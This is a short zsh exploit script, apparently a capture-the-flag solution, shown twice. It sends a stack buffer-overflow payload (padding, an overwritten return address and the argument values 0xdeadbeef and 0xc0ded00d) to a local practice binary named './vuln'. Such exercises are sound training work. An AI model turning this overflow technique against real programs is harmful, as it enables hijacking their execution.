originalsouth/vuln.zsh

## vuln.zsh
#!/usr/bin/env zsh
[[ -z $DEBUG ]] || set -x
TARGET=./vuln
BUFF=$(printf 'x%.0s' {1..188})
FUNC=$(printf '\xE2\x91\x04\x08')
VAR1=$(printf '\xEF\xBE\xAD\xDE')
VAR2=$(printf '\x0D\xD0\xDE\xC0')
PADD=$(printf '\xFF%.0s' {1..4})
PAYLOAD=$(printf '%s%s%s%s%s%s' $BUFF $FUNC $PADD $VAR1 $VAR2)
[[ -z $DEBUG ]] || echo -n "$PAYLOAD" | xxd
PIPE=$(mktemp -u)
mkfifo -m 600 $PIPE
cat $PIPE | $TARGET &
echo "$PAYLOAD" >> $PIPE
wait
rm -f $PIPE
exit 0
	#!/usr/bin/env zsh
	[[ -z $DEBUG ]] \|\| set -x
	TARGET=./vuln
	BUFF=$(printf 'x%.0s' {1..188})
	FUNC=$(printf '\xE2\x91\x04\x08')
	VAR1=$(printf '\xEF\xBE\xAD\xDE')
	VAR2=$(printf '\x0D\xD0\xDE\xC0')
	PADD=$(printf '\xFF%.0s' {1..4})
	PAYLOAD=$(printf '%s%s%s%s%s%s' $BUFF $FUNC $PADD $VAR1 $VAR2)
	[[ -z $DEBUG ]] \|\| echo -n "$PAYLOAD" \| xxd
	PIPE=$(mktemp -u)
	mkfifo -m 600 $PIPE
	cat $PIPE \| $TARGET &
	echo "$PAYLOAD" >> $PIPE
	wait
	rm -f $PIPE
	exit 0